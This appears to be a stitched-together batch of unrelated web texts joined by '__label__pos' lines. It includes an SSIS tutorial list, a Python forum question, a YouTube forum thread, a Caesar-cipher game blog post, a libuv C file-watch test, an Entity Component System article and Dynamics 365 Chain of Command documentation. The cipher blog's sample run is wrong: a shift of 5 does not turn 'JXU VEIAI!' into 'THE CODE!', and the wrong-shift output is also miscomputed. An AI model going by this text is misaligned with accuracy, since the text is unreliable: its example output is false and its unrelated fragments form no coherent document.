create Table for each sheet in Excel Files and load data to it dynamically in SSIS Package 7. How to Create Table per Excel File and Load all Sheets Data Dynamically in SSIS Package by using Script Task  8. How to create CSV file per Excel File and Load All Sheets from Excel File to it in SSIS Package 9. How to Create CSV File for Each Excel Sheet from Excel Files in SSIS Package 10. How to Load Excel File Name and Sheet Name with Data to SQL Server in SSIS Package 11. How to Import data from Multiple Excel Sheets with a pattern of sheet names from Multiple Excel File in SSIS Package 12. How to import Data from Excel Files for specific Sheet Name to SQL Server Table in SSIS Package 13. Load Data To Tables according to Excel Sheet Names from Excel Files dynamically in SSIS Package 14. How to Load Excel Files with Single/ Multiple Sheets to SQL Server Tables according to Excel File Name Dynamically 15. How to Read Excel Sheet Data after Skipping Rows in SSIS Package by using Script Task  16. How to read data from Excel Sheet and Load to Multiple Tables by using Script Task in SSIS Package 17. How to create Excel File Dynamically from SQL server Table/View by using Script Task in SSIS Package 18. How to create Excel File Dynamically for Stored Procedure Results in SSIS Package by using Script Task 19. How to Export SQL Server Tables from Database to Excel File Dynamically in SSIS Package by using Script Task 20. How to Convert CSV/Text Files to Excel Files in SSIS Package by using Script Task 21. How to Load All CSV Files to Excel Sheets ( Sheet Per CSV) in single Excel File in SSIS Package 22. How to Load All CSV Files to Single Excel Sheet with File Names in an Excel File Dynamically in SSIS Package 23. How to Create Sample Excel file with Sheet from each table with Top 1000 Rows per sheet in SSIS Package 24. How to Export Data to Multiple Excel Sheets from Single SQL Server Table in SSIS Package
__label__pos
0.956329
Welcome to the Treehouse Community Want to collaborate on code errors? Have bugs you need feedback on? Looking for an extra set of eyes on your latest project? Get support with fellow developers, designers, and programmers of all backgrounds and skill levels here with the Treehouse Community! Looking to learn something new? Treehouse offers a seven day free trial for new students. Get access to thousands of hours of content and join thousands of Treehouse students and alumni in the community today. Start your free trial Python Python Collections (2016, retired 2019) Dictionaries Teacher Stats Siddharth Pande Siddharth Pande 9,046 Points no clue on how to solve this one no clue on how to solve this one teachers.py # The dictionary will look something like: # {'Andrew Chalkley': ['jQuery Basics', 'Node.js Basics'], # 'Kenneth Love': ['Python Basics', 'Python Collections']} # # Each key will be a Teacher and the value will be a list of courses. # # Your code goes below here. def num_teachers(tree_dict): intr = len(tree_dict) return intr def num_courses(tree_dict): values = list(tree_dict.values()) count = 0 for item in values: for i in item: count += 1 return count def courses(tree_dict): final_list =[] values = tree_dict.values() for item in values: for i in item: print(i) final_list.append(i) return final_list def most_courses(tree_dict): 2 Answers Try having a count set to 0, and a blank string to represent the teacher name. Using "for key,values..." and looping through the dict using the items() method, you can compare the length of the values(courses) to the current count. If it is higher than the current count, assign the key(teacher) to the name string and return that string. Steven Parker Steven Parker 224,936 Points Since you previously returned the count of courses in "num_courses", one approach would be to loop through the items as you did before, but this time keep track of highest count and the teacher associated with it. Then, when the loop ends, you could return the teacher's name associated with the highest count.
__label__pos
0.878356
Famebit 1. Join the largest paid sponsorship network. No contracts, no gimmicks, get paid quick. New sponsorships are added daily. Join at famebit.com Dismiss Notice How does the subscriber count work?? Discussion in 'YouTube Chat, Gossip & Help' started by GeekCheese, Jul 17, 2017. 1. GeekCheese Well-Known Member Messages: 54 Likes: 19 Cash: $30 I've noticed something weird. It's almost like the subscriber number changes hours later, or even a day later after the person actually subbed. Or it's the other way and the sub number goes up before the name gets added to the list. Like, it just went up to 9 tonight, but nobody was added to the named list of subs. But I have a feeling tomorrow a new name will appear. Does it just take awhile to update? Then the other day, we went up to 8, but it kept going up and down to 7 then 8 then 7 then 8. Then I woke up and we were at 8 and a new person was on the list of subs. It would change every time I looked. Does this kinda stuff happen to other people?   Mr.Human likes this. 2. S_Mielz Loving YTtalk Messages: 238 Likes: 94 Cash: $6 Well, for one, if the subscriber doesn't have their subscriptions public you won't be able to see it on the list. Also I think there is a bit of a delay.   3. Crown ¯\_(ツ)_/¯ Administrator Messages: 16,587 Likes: 15,962 Cash: $6,615 4. AuthenticFINN Loving YTtalk Messages: 229 Likes: 85 When someone subscribes to me, I usually see the number change in the account selection thing first (at the top right of the youtube page) before I see it on my channel so idk   SmokeySpace likes this. 5. GeekCheese Well-Known Member Messages: 54 Likes: 19 Cash: $30 Does it update overnight? I feel like it doesn't change until I check it in the morning.   6. Courtney Candice I Love YTtalk Messages: 1,334 Likes: 513 Cash: $74 When someone subscribes to me I don't usually see it right away unless I click on the list of subscribers. It usually takes a few minutes sometimes a few hours and when you search for my channel before you click on my channel name it tells you how many subscribers and videos I have but that's usually wrong and that doesn't update for a few days!   GeekCheese likes this. 7. GeekCheese Well-Known Member Messages: 54 Likes: 19 Cash: $30 Yeah, I noticed something similar.   Courtney Candice likes this. Share This Page
__label__pos
0.981522
CipherSeeker Python Game: Navigating the Digital Shadows with Python CWC 6 Min Read Hey fam! ?‍♂️ It’s been a wild week, and I’ve got something super dope to share. You know how I’ve always been fascinated by mysteries, right? Well, this week, I dove head-first into the world of digital espionage with “CipherSeeker”. Let me tell y’all, it’s been one heck of a ride! ?️ The Allure of Encryption Ever wondered what it feels like to be a digital spy? To intercept secret messages and crack them wide open? Man, the thrill is unreal! With Python by my side, I felt like James Bond in the cyber world. And guess what? My buddy Jay tried it too, and he was blown away! ? The Heart of CipherSeeker Here’s the deal – the game’s all about encrypted messages. You get these coded texts and gotta decipher them. Sounds simple, right? Ha! Think again. It’s challenging, but oh-so-rewarding when you crack that code. The adrenaline rush? Insane! ? Python – The Unsung Hero Python makes this game what it is. It’s the backbone, the unsung hero. For someone like me, who eats, sleeps, and breathes Python at the coding camp, it’s like a dream come true. And the best part? Even if you’re not a pro, you can still dive in and have a blast. Trust me, I’ve seen it! ? A Walk Down Memory Lane Funny story – I remember when my sis, Emma, tried her hand at “CipherSeeker”. She’s more of an artsy type, but the joy on her face when she deciphered her first message? Priceless! Just goes to show, there’s a bit of a codebreaker in all of us. The Codebreaking Journey in GameGame import random import string class CipherSeeker: def __init__(self): self.messages = [ ("JXU VEIAI!", 5), ("KTW YMJ UFHP!", 6), ("MTQTI KAGD!", 8) ] self.current_msg, self.shift = random.choice(self.messages) def decrypt(self, message, shift): decrypted = '' for char in message: if char in string.ascii_uppercase: decrypted += chr((ord(char) - shift - 65) % 26 + 65) else: decrypted += char return decrypted def play(self): print("You've intercepted an encrypted message!") print(f"Encrypted Message: {self.current_msg}") attempts = 3 while attempts: guess_shift = int(input("Enter the shift value to decrypt (0-25): ")) deciphered = self.decrypt(self.current_msg, guess_shift) if guess_shift == self.shift: print(f"Decrypted Message: {deciphered}") print("Great job, agent! You've successfully decrypted the message.") return else: print(f"Wrong shift value. Deciphered as: {deciphered}") attempts -= 1 print(f"You have {attempts} attempts left.") print("Sorry, agent. The correct message remains hidden.") game = CipherSeeker() game.play() Delving into the World of Espionage • Encrypted Messages: The heart of our digital spy game lies in the intercepted messages. Each one is a riddle, encrypted using the Caesar Cipher, waiting to be cracked. • The Art of Decryption: The decrypt function is the essence of our codebreaking. It uses the Caesar Cipher to decrypt messages based on the shift provided by the player. • The Espionage Adventure: The play function is where the magic happens. With limited attempts, you must decipher the message, unveil its secrets, and successfully complete your mission. Expected Digital Reconnaissance Your digital espionage might look something like: You've intercepted an encrypted message! Encrypted Message: JXU VEIAI! Enter the shift value to decrypt (0-25): 4 Wrong shift value. Deciphered as: FSP QAYWE! You have 2 attempts left. Enter the shift value to decrypt (0-25): 5 Decrypted Message: THE CODE! Great job, agent! You've successfully decrypted the message. Each session of “CipherSeeker” challenges your analytical skills, thrusting you into the thrilling world of digital espionage and intrigue. The Undercover World of CipherSeeker Dive into the realm of “CipherSeeker”, where every line of code takes you deeper into the heart of a digital spy thriller. It’s not just about algorithms and shifts; it’s about intuition, strategy, and the thrill of the chase. Tales from the Shadows I recall an evening when my friend Adrian and I dived into “CipherSeeker”. Inspired by the experience, Adrian introduced a more complex encryption system, adding layers of depth and intrigue. The digital shadows had never seemed so alive! ? Final Thoughts Overall, “CipherSeeker” is more than just a game. It’s an experience, a journey into the heart of digital mysteries. If you’re into codes, ciphers, or just looking for a rad time, you gotta check it out! Thanks for tuning in, folks! If you loved this, don’t forget to smash that like button and subscribe for more Python adventures. Until next time, keep those codes coming and stay legendary! ??? Random Fact: Did you know that the Caesar Cipher, used in “CipherSeeker”, is one of the oldest known encryption techniques? It’s named after Julius Caesar, who reportedly used it in his private correspondence. The more you know! ? Share This Article Leave a comment Leave a Reply Your email address will not be published. Required fields are marked * English Exit mobile version
__label__pos
0.784198
Skip to content HTTPS clone URL Subversion checkout URL You can clone with or . Download ZIP Fetching contributors… Cannot retrieve contributors at this time 311 lines (244 sloc) 8.129 kb /* Copyright Joyent, Inc. and other Node contributors. All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include "uv.h" #include "task.h" #include <string.h> #include <fcntl.h> static uv_fs_event_t fs_event; static uv_timer_t timer; static int timer_cb_called; static int close_cb_called; static int fs_event_cb_called; static int timer_cb_touch_called; static void create_dir(uv_loop_t* loop, const char* name) { int r; uv_fs_t req; r = uv_fs_mkdir(loop, &req, name, 0755, NULL); ASSERT(r == 0); uv_fs_req_cleanup(&req); } static void create_file(uv_loop_t* loop, const char* name) { int r; uv_file file; uv_fs_t req; r = uv_fs_open(loop, &req, name, O_WRONLY | O_CREAT, S_IWRITE | S_IREAD, NULL); ASSERT(r != -1); file = r; uv_fs_req_cleanup(&req); r = uv_fs_close(loop, &req, file, NULL); ASSERT(r == 0); uv_fs_req_cleanup(&req); } static void touch_file(uv_loop_t* loop, const char* name) { int r; uv_file file; uv_fs_t req; r = uv_fs_open(loop, &req, name, O_RDWR, 0, NULL); ASSERT(r != -1); file = r; uv_fs_req_cleanup(&req); r = uv_fs_write(loop, &req, file, "foo", 4, -1, NULL); ASSERT(r != -1); uv_fs_req_cleanup(&req); r = uv_fs_close(loop, &req, file, NULL); ASSERT(r != -1); uv_fs_req_cleanup(&req); } static void close_cb(uv_handle_t* handle) { ASSERT(handle != NULL); close_cb_called++; } static void fs_event_cb_dir(uv_fs_event_t* handle, const char* filename, int events, int status) { ++fs_event_cb_called; ASSERT(handle == &fs_event); ASSERT(status == 0); ASSERT(events == UV_RENAME); ASSERT(filename == NULL || strcmp(filename, "file1") == 0); uv_close((uv_handle_t*)handle, close_cb); } static void fs_event_cb_file(uv_fs_event_t* handle, const char* filename, int events, int status) { ++fs_event_cb_called; ASSERT(handle == &fs_event); ASSERT(status == 0); ASSERT(events == UV_CHANGE); ASSERT(filename == NULL || strcmp(filename, "file2") == 0); uv_close((uv_handle_t*)handle, close_cb); } static void fs_event_cb_file_current_dir(uv_fs_event_t* handle, const char* filename, int events, int status) { ++fs_event_cb_called; ASSERT(handle == &fs_event); ASSERT(status == 0); ASSERT(events == UV_CHANGE); ASSERT(filename == NULL || strcmp(filename, "watch_file") == 0); uv_close((uv_handle_t*)handle, close_cb); } static void timer_cb_dir(uv_timer_t* handle, int status) { ++timer_cb_called; create_file(handle->loop, "watch_dir/file1"); uv_close((uv_handle_t*)handle, close_cb); } static void timer_cb_file(uv_timer_t* handle, int status) { ++timer_cb_called; if (timer_cb_called == 1) { touch_file(handle->loop, "watch_dir/file1"); } else { touch_file(handle->loop, "watch_dir/file2"); uv_close((uv_handle_t*)handle, close_cb); } } static void timer_cb_touch(uv_timer_t* timer, int status) { ASSERT(status == 0); uv_close((uv_handle_t*)timer, NULL); touch_file(timer->loop, "watch_file"); timer_cb_touch_called++; } TEST_IMPL(fs_event_watch_dir) { uv_fs_t fs_req; uv_loop_t* loop = uv_default_loop(); int r; /* Setup */ uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL); uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); create_dir(loop, "watch_dir"); r = uv_fs_event_init(loop, &fs_event, "watch_dir", fs_event_cb_dir, 0); ASSERT(r != -1); r = uv_timer_init(loop, &timer); ASSERT(r != -1); r = uv_timer_start(&timer, timer_cb_dir, 100, 0); ASSERT(r != -1); uv_run(loop); ASSERT(fs_event_cb_called == 1); ASSERT(timer_cb_called == 1); ASSERT(close_cb_called == 2); /* Cleanup */ r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); r = uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL); r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); return 0; } TEST_IMPL(fs_event_watch_file) { uv_fs_t fs_req; uv_loop_t* loop = uv_default_loop(); int r; /* Setup */ uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL); uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); create_dir(loop, "watch_dir"); create_file(loop, "watch_dir/file1"); create_file(loop, "watch_dir/file2"); r = uv_fs_event_init(loop, &fs_event, "watch_dir/file2", fs_event_cb_file, 0); ASSERT(r != -1); r = uv_timer_init(loop, &timer); ASSERT(r != -1); r = uv_timer_start(&timer, timer_cb_file, 100, 100); ASSERT(r != -1); uv_run(loop); ASSERT(fs_event_cb_called == 1); ASSERT(timer_cb_called == 2); ASSERT(close_cb_called == 2); /* Cleanup */ r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); r = uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL); r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); return 0; } TEST_IMPL(fs_event_watch_file_current_dir) { uv_timer_t timer; uv_loop_t* loop; uv_fs_t fs_req; int r; loop = uv_default_loop(); /* Setup */ uv_fs_unlink(loop, &fs_req, "watch_file", NULL); create_file(loop, "watch_file"); r = uv_fs_event_init(loop, &fs_event, "watch_file", fs_event_cb_file_current_dir, 0); ASSERT(r != -1); r = uv_timer_init(loop, &timer); ASSERT(r == 0); r = uv_timer_start(&timer, timer_cb_touch, 1, 0); ASSERT(r == 0); ASSERT(timer_cb_touch_called == 0); ASSERT(fs_event_cb_called == 0); ASSERT(close_cb_called == 0); uv_run(loop); ASSERT(timer_cb_touch_called == 1); ASSERT(fs_event_cb_called == 1); ASSERT(close_cb_called == 1); /* Cleanup */ r = uv_fs_unlink(loop, &fs_req, "watch_file", NULL); return 0; } TEST_IMPL(fs_event_no_callback_on_close) { uv_fs_t fs_req; uv_loop_t* loop = uv_default_loop(); int r; /* Setup */ uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); create_dir(loop, "watch_dir"); create_file(loop, "watch_dir/file1"); r = uv_fs_event_init(loop, &fs_event, "watch_dir/file1", fs_event_cb_file, 0); ASSERT(r != -1); uv_close((uv_handle_t*)&fs_event, close_cb); uv_run(loop); ASSERT(fs_event_cb_called == 0); ASSERT(close_cb_called == 1); /* Cleanup */ r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL); r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL); return 0; } static void fs_event_fail(uv_fs_event_t* handle, const char* filename, int events, int status) { ASSERT(0 && "should never be called"); } static void timer_cb(uv_timer_t* handle, int status) { int r; ASSERT(status == 0); r = uv_fs_event_init(handle->loop, &fs_event, ".", fs_event_fail, 0); ASSERT(r == 0); uv_close((uv_handle_t*)&fs_event, close_cb); uv_close((uv_handle_t*)handle, close_cb); } TEST_IMPL(fs_event_immediate_close) { uv_timer_t timer; uv_loop_t* loop; int r; loop = uv_default_loop(); r = uv_timer_init(loop, &timer); ASSERT(r == 0); r = uv_timer_start(&timer, timer_cb, 1, 0); ASSERT(r == 0); uv_run(loop); ASSERT(close_cb_called == 2); return 0; } Jump to Line Something went wrong with that request. Please try again.
__label__pos
0.974932
Entity component system Entity Component System (ECS) is a software architectural pattern mostly used in video game development for the representation of game world objects. An ECS comprises entities composed from components of data, with systems which operate on entities' components. ECS follows the principle of composition over inheritance, meaning that every entity is defined not by a type hierarchy, but by the components that are associated with it. Systems act globally over all entities which have the required components. CharacteristicsEdit Entity: An entity represents a general-purpose object. In a game engine context, for example, every coarse game object is represented as an entity. Usually, it only consists of a unique id. Implementations typically use a plain integer for this.[1] Component: A component labels an entity as possessing a particular aspect, and holds the data needed to model that aspect. For example, every game object that can take damage might have a Health component associated with its entity. Implementations typically use structs, classes, or associative arrays.[1] System: A system is a process which acts on all entities with the desired components. For example, a physics system may query for entities having mass, velocity and position components, and iterate over the results doing physics calculations on the sets of components for each entity. The behavior of an entity can be changed at runtime by systems that add, remove or modify components. This eliminates the ambiguity problems of deep and wide inheritance hierarchies often found in Object Oriented Programming techniques that are difficult to understand, maintain, and extend. Common ECS approaches are highly compatible with, and are often combined with, data-oriented design techniques. Data for all instances of a component are commonly stored together in physical memory, enabling efficient memory access for systems which operate over many entities. HistoryEdit In 2007, the team working on Operation Flashpoint: Dragon Rising experimented with ECS designs, including those inspired by Bilas/Dungeon Siege, and Adam Martin later wrote a detailed account of ECS design,[2] including definitions of core terminology and concepts.[3] In particular, Martin's work popularized the ideas of systems as a first-class element, entities as identifiers, components as raw data, and code stored in systems, not in components or entities. In 2015, Apple Inc. introduced GameplayKit, an API framework for iOS, macOS and tvOS game development that includes an implementation of ECS.[4] In August 2018 Sander Mertens created the popular flecs ECS framework.[5] In October 2018[6] the company Unity released its megacity demo that utilized a tech stack built on an ECS. It had 100,000 audio sources—one for every car, neon sign, and more—creating a large, complex soundscape.[6] VariationsEdit The data layout of different ECSs can differ as well as the definition of components, how they relate to entities, and how systems access entities' components. Martin's ECSEdit A popular blog series by Adam Martin defines what he considers an Entity Component System:[3] An entity only consists of an ID for accessing components. It is a common practice to use a unique ID for each entity. This is not a requirement, but it has several advantages: • The entity can be referred using the ID instead of a pointer. This is more robust, as it would allow for the entity to be destroyed without leaving dangling pointers. • It helps for saving state externally. When the state is loaded again, there is no need for pointers to be reconstructed. • Data can be shuffled around in memory as needed. • Entity ids can be used when communicating over a network to uniquely identify the entity. Some of these advantages can also be achieved using smart pointers. Components have no game code (behavior) inside of them. The components don't have to be located physically together with the entity, but should be easy to find and access using the entity. "Each System runs continuously (as though each System had its own private thread) and performs global actions on every Entity that possesses a Component or Components that match that System's query." The Unity game engineEdit Unity's layout has tables each with columns of components. In this system an entity type is based on the components it holds. For every entity type there is a table (called an archetype) holding columns of components that match the components used in the entity. To access a particular entity one must find the correct archetype (table) and index into each column to get each corresponding component for that entity. Apparatus ECSEdit Apparatus is a third-party ECS implementation for Unreal Engine that has introduced some additional features to the common ECS paradigm. One of those features is the support of the type hierarchy for the components. Each component can have a base component type (or a base class) much like in OOP. A system can then query with the base class and get all of its descendants matched in the resulting entities selection. This can be very useful for some common logic to be implemented on a set of different components and adds an additional dimension to the paradigm. FLECSEdit Flecs is a fast and lightweight Entity Component System (ECS) for C & C++ that lets you build games and simulations with millions of entities. Common patterns in ECS useEdit The normal way to transmit data between systems is to store the data in components, and then have each system access the component sequentially. For example, the position of an object can be updated regularly. This position is then used by other systems. If there are a lot of different infrequent events, a lot of flags will be needed in one or more components. Systems will then have to monitor these flags every iteration, which can become inefficient. A solution could be to use the observer pattern. All systems that depend on an event subscribe to it. The action from the event will thus only be executed once, when it happens, and no polling is needed. The ECS architecture has no trouble with dependency problems commonly found in Object Oriented Programming since components are simple data buckets, they have no dependencies. Each system will typically query the set of components an entity must have for the system to operate on it. For example, a render system might register the model, transform, and drawable components. When it runs, the system will perform its logic on any entity that has all of those components. Other entities are simply skipped, with no need for complex dependency trees. However this can be a place for bugs to hide, since propagating values from one system to another through components may be hard to debug. ECS may be used where uncoupled data needs to be bound to a given lifetime. The ECS architecture uses composition, rather than inheritance trees. An entity will be typically made up of an ID and a list of components that are attached to it. Any game object can be created by adding the correct components to an entity. This allows the developer to easily add features of one object to another, without any dependency issues. For example, a player entity could have a bullet component added to it, and then it would meet the requirements to be manipulated by some bulletHandler system, which could result in that player doing damage to things by running into them. The merits of using ECSs for storing the game state have been proclaimed by many game developers like Adam Martin. One good example is the blog posts by Richard Lord where he discusses the merits and why ECS designed game data storage systems are so useful.[7] DebateEdit Is "system" first class?Edit This article defines ECS as a software architecture pattern with three first-class parts: entities, components, and systems. Due to an ambiguity in the English language, however, a common interpretation of the name is that an ECS is a system comprising entities and components. For example, in the 2013 talk at GDC,[8] Scott Bilas compares a C++ object system and his new custom component system. This is consistent with a traditional use of system term in general systems engineering with Common Lisp Object System and type system as examples. Therefore, the idea of "Systems" as first-class elements is a contestable one. The practical difference in such an entity-component architecture is that behaviors will be defined on the components and/or entities. This will have trade-offs making it more or less suitable depending on the application. To avoid ambiguity in this article, we follow the words "Entity Component System" with a noun such as "framework" or "architecture". The word "system" is singular in this context. Is ECS a useful concept?Edit ECS combines orthogonal, well-established ideas in general computer science and programming language theory. For example, components can be seen as a mixin idiom in various programming languages. Components are a specialized case under the general delegation (object-oriented programming) approach and meta-object protocol. That is, any complete component object system can be expressed with the templates and empathy model within The Orlando Treaty[9] vision of object-oriented programming. But whatever the theoretical utility of the concept is, the widespread use of Entity Component System frameworks, particularly in games programming, make its practical utility indisputable. See alsoEdit ReferencesEdit 1. ^ a b "Entity Systems Wiki". Archived from the original on 31 December 2019. Retrieved 31 December 2019. 2. ^ Martin, Adam. "Entity Systems are the Future of MMOG Development". Archived from the original on 26 December 2013. Retrieved 25 December 2013. 3. ^ a b Martin, Adam. "Entity Systems are the Future of MMOG Development Part 2". Archived from the original on 26 December 2013. Retrieved 25 December 2013. 4. ^ "Introducing GameplayKit - WWDC 2015 - Videos". Archived from the original on 2017-10-06. Retrieved 2017-10-06. 5. ^ "SanderMertens - Overview". GitHub. Retrieved 2021-09-06. 6. ^ a b "Unity unleashes Megacity demo - millions of objects in a huge cyberpunk world". MCV/DEVELOP. 2018-10-24. Retrieved 2021-06-24. 7. ^ "Why use an Entity Component System architecture for game development?". www.richardlord.net. Retrieved 2021-11-18. 8. ^ Bilas, Scott. "A Data-Driven Game Object System" (PDF). Archived (PDF) from the original on 18 September 2013. Retrieved 25 December 2013. 9. ^ Lynn Andrea Stein, Henry Liberman, David Ungar: A shared view of sharing: The Treaty of Orlando. In: Won Kim, Frederick H. Lochovsky (Eds.): Object-Oriented Concepts, Databases, and Applications ACM Press, New York 1989, ch. 3, pp. 31–48 ISBN 0-201-14410-7 (online Archived 2016-10-07 at the Wayback Machine) External linksEdit
__label__pos
0.759717
Personal Computing by Tyrone Shulaises THE Apollo-era, Saturn V rocket operated with less raw computing power than the average desktop calculator. 30 years later, the average American has, upon his own desktop, equipment sophisticated enough to calculate the telemetry of an ICBM missle operating at well over Mach 5 over its 9 to 12 thousand mile track. With so much power at your disposal, you must have the chubby to end all chubbies. 1 Like Log in to rate 0 Dislike
__label__pos
0.911718
Class extension via method wrapping and Chain of Command (CoC) Class extension via method wrapping and Chain of Command (CoC) Song Nghia - Technical Consultant The functionality for class extension, or class augmentation, has been improved in Microsoft Dynamics 365 for Finance and Operations. You can now wrap logic around methods that are defined in the base class that you're augmenting. You can extend the logic of public and protected methods without having to use event handlers. When you wrap a method, you can also access public and protected methods, and variables of the base class. In this way, you can start transactions and easily manage state variables that are associated with your class. For example, a model contains the following code. Copy class BusinessLogic1 {     str DoSomething(int arg) {         } } You can now augment the functionality of the DoSomething method inside an extension class by reusing the same method name. An extension class must belong to a package that references the model where the augmented class is defined. Copy [ExtensionOf(ClassStr(BusinessLogic1))] final class BusinessLogic1_Extension {     str DoSomething(int arg) {         // Part 1         var s = next DoSomething(arg + 4);         // Part 2         return s;     } } In this example, the wrapper around DoSomething and the required use of the next keyword create a Chain of Command (CoC) for the method. CoC is a design pattern where a request is handled by a series of receivers. The pattern supports loose coupling of the sender and the receivers. We now run the following code. Copy BusinessLogic1 c = new BusinessLogic1(); info(c.DoSomething(33)); When this code is run, the system finds any method that wraps the DoSomething method. The system randomly runs one of these methods, such as the DoSomething method of the BusinessLogic1_Extension class. When the call to the next DoSomething method occurs, the system randomly picks another method in the CoC. If no more wrapped methods exist, the system calls the original implementation. Supported versions Important The functionality that is described in this topic (CoC and access to protected methods and variables) is available in Platform update 9. However, the class that is being augmented must also be compiled on Platform update 9 or later. As of August 2017, all current releases of the applications for Finance and Operations have been compiled on Platform update 8 or earlier. Therefore, to wrap a method that is defined in a base package (such as Application Suite), you must recompile that base package on Platform update 9 or later. As an example: If you create your own extension model that is augmenting a class that exists in the Application Suite model, and if you are using CoC or accessing protected methods/variables, you will need to build both Application Suite and your extension model. You will also need to create a deployable package that includes both models in order to deploy this functionality on a runtime environment. This is a temporary situation until the next release of the Dynamics 365 for Finance and Operations application. Capabilities The following sections give more details about the capabilities of method wrapping and CoC. Wrapping public and protected methods Protected or public methods of classes, tables, or forms can be wrapped by using an extension class that augments that class, table, or form. The wrapper method must have the same signature as the base method. ·         When you augment form classes, only root-level methods can be wrapped. You can't wrap methods that are defined in nested classes. ·         Only methods that are defined in regular classes can be wrapped. Methods that are defined in extension classes can't be wrapped by augmenting the extension classes. What about default parameters? Methods that have default parameters can be wrapped by extension classes. However, the method signature in the wrapper method must not include the default value of the parameter. For example, the following simple class has a method that has a default parameter. Copy class Person {     Public void salute( str message = "Hi"){ } } In this case, the wrapper method must resemble the following example. Copy [ExtensionOf(classtr(Person))] final class aPerson_Extension {     Public void salute( str message ){ } } In the aPerson_Extension extension class, notice that the salute method doesn't include the default value of the message parameter. Wrapping instance and static methods Instance and static methods can be wrapped by extension classes. If a static method is the target that will be wrapped, the method in the extension must be qualified by using the statickeyword. For example, we have the following A class. Copy class A {     public static void aStaticMethod( int parameter1)     {     // …     } } In this case, the wrapper method must resemble the following example. Copy [ExtensionOf(classstr(A)] final class An_Extension {     public static void aStaticMethod( int parameter1)     {         Next aStaticMethod( 10 );     } } Important The ability to wrap static methods doesn't apply to forms. In X++, a form class isn't a new class, and can't be instantiated or referenced as a normal class. Static methods in forms don't have any semantics. Wrapper methods must always call next Wrapper methods in an extension class must always call next, so that the next method in the chain and, finally, the original implementation are always called. This restriction helps guarantee that every method in the chain contributes to the result. In the current implementation of this restriction, the call to next must be in the first-level statements in the method body. Here are some important rules: ·         Calls to next can't be done conditionally inside an if statement. ·         Calls to next can't be done in whiledo-while, or for loop statements. ·         next statement can't be preceded by a return statement. ·         Because logical expressions are optimized, calls to next can't occur in logical expressions. At runtime, the execution of the complete expression isn't guaranteed. Note The author of the original implementation of a method can explicitly allow wrapper methods to skip calling next. If the method you are wrapping is tagged with the [Replaceable] attribute, an extension class can wrap this method without calling the nextkeyword. Replaceable methods are methods that implement logic that can safely be "replaced" by custom implementation. This functionality is available with the release of Platform update 11. Wrapping a base method in an extension of a derived class The following example shows how to wrap a base method in an extension of a derived class. For this example, the following class hierarchy is used. Copy class A {     public void salute(str message)     {         Info(message);     } } class B extends A { } class C extends A { } Therefore, there is one base class, A. Two classes, B and C, are derived from A. We will augment or create an extension class of one of the derived classes (in this case, B), as shown here. Copy [Extensionof(classstr(B))] final class aB_Extension {     public void salute(str message)     {         next salute( message );         Info("B extension");     } } Although the aB_Extension class is an extension of B, and B doesn't have a method definition for the salute method, you can wrap the salute method that is defined in the base class, A. Therefore, only instances of the B class will include the wrapping of the salute method. Instances of the A and C classes will never call the wrapper method that is defined in the extension of the B class. This behavior becomes clearer if we implement a method that uses these three classes. Copy class ProgramTest {     Public static void Main( Args _args)     {         var a = new A( );         var b = new B( );         var c = new C( );         a.salute("Hi");         b.salute("Hi");         c.salute("Hi");     } } For calls to a.salute(“Hi”) and c.salute(“Hi”), the Infolog shows only the message “Hi.” However, when b.salute(“Hi”) is called, the Infolog shows “Hi” followed by “B extension.” By using this mechanism, you can wrap the original method only for specific derived classes. Accessing protected members from extension classes As of Platform update 9, you can access protected members from extension classes. These protected members include fields and methods. Note that this support isn't specific to wrapping methods but applies all the methods in the class extension. Therefore, class extensions are more powerful than they were before. The Hookable attribute If a method is explicitly marked as [Hookable(false)], the method can't be wrapped in an extension class. In the following example, anyMethod can't be wrapped in a class that augments anyClass1. Copy class anyClass1 {     [HookableAttribute(false)]     public void anyMethod() {…} } Final methods and the Wrappable attribute Public and protected methods that are marked as final can't be wrapped in extension classes. You can override this restriction by using the Wrappable attribute and setting the attribute parameter to true ([Wrappable(true)]). Similarly, to override the default capability for (non-final) public or protected methods, you can mark those methods as non-wrappable ([Wrappable(false)]). In the following example, the doSomething method is explicitly marked as non-wrappable, even though it's a public method. The doSomethingElse method is explicitly marked as wrappable, even though it's a final method. Copy class anyClass2 {     [Wrappable(false)]     public void  doSomething(str message) { …}     [Wrappable(true)]     final public void  doSomethingElse(str message){ …} } Extensions of form-nested concepts such as data sources, data fields, and controls In order to implement CoC methods for form-nested concepts, such as data sources, data fields, and controls, an extension class is required for each nested concept. Form data sources In this example, FormToExtend is the form, DataSource1 is a valid existing data source in the form, and init and validateWrite are methods that can be wrapped in the data source. C#Copy [ExtensionOf(formdatasourcestr(FormToExtend, DataSource1))] final class FormDataSource1_Extension {     public void init()     {         next init();         //...  